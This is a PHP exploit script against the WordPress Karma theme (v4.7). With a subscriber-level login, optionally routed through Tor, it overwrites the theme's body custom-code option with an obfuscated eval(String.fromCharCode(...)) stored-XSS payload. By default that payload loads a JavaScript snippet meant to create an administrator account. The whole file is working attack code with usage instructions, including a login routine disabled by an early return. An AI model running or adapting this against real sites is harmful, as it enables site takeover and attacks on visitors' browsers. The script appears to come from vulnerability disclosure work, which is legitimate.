<?php /** * Exploit Title: Karma Theme Exploit * Version: 4.7 * Tested on: Debian 8, PHP 5.6.17-3 * Type: Authenticated Options overwrite, Stored XSS * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:m:u:p:f:c:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ###\n"; echo "Setting TOR Proxy...\n"; $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address\n"; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()."\n"; echo "Are you sure you want to do this?\nType 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting!\n"); } echo "OK...\n"; } function logIn(){ return true; global $curl, $options; file_put_contents('cookies.txt',"\n"); $curl->setCookieFile('cookies.txt'); $curl->get($options['t']); $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>'', 'wp-submit'=>'Log In'); $curl->post($options['t'].'/wp-login.php', $data); $status = $curl->getTransferInfo('http_code'); if ($status !== 302){ echo "Login probably failed, aborting...\n"; echo "Login response saved to login.html.\n"; die(); } file_put_contents('login.html',$curl->getResponse()); } function exploit(){ global $curl, $options; if (!isset($options['f'])){ $file = 'inject_admin.js'; $js_code = file_get_contents(dirname(__FILE__).'/'.$file); } else { $js_code = file_get_contents(realpath($options['f'])); } echo "Injecting JS Code:\n\n"; echo $js_code."\n\n\n"; $inject = array(); for ($i = 0; $i < strlen($js_code); $i++){ $inject[] = ord($js_code[$i]); } $inject = 'eval(String.fromCharCode('.implode(',',$inject).'))'; $data = array('action'=>'of_ajax_post_action', 'type'=>'options', 'data'=>'ka_customcode_body=<script>'.$inject.'</script>'); echo "Payload ". http_build_query($data) . "\n"; $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); echo $resp; } logIn(); exploit(); function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if ( !isset($options['u']) ){ return false; } if ( !isset($options['p']) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } if (!isset($options['m']) || !in_array($options['m'], array('wpc','r','i','t') ) ){ return false; } if ($options['m'] == 'r' && !isset($options['f'])){ return false; } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD Karma Theme Exploit (Theme options overwrite) Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m i -f [FILE] *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" ** [TARGET_URL] http://localhost/wordpress/ [MODE] i - Inject JavaScript into the body tag. [FILE] You can provide a file with the JS code that you want to include in the <body> By default it injects an Admin creator JS snippet called inject_admin.js Examples: php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i -f custom_xss.js Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help."\n\n"; die(); }
评论 (0)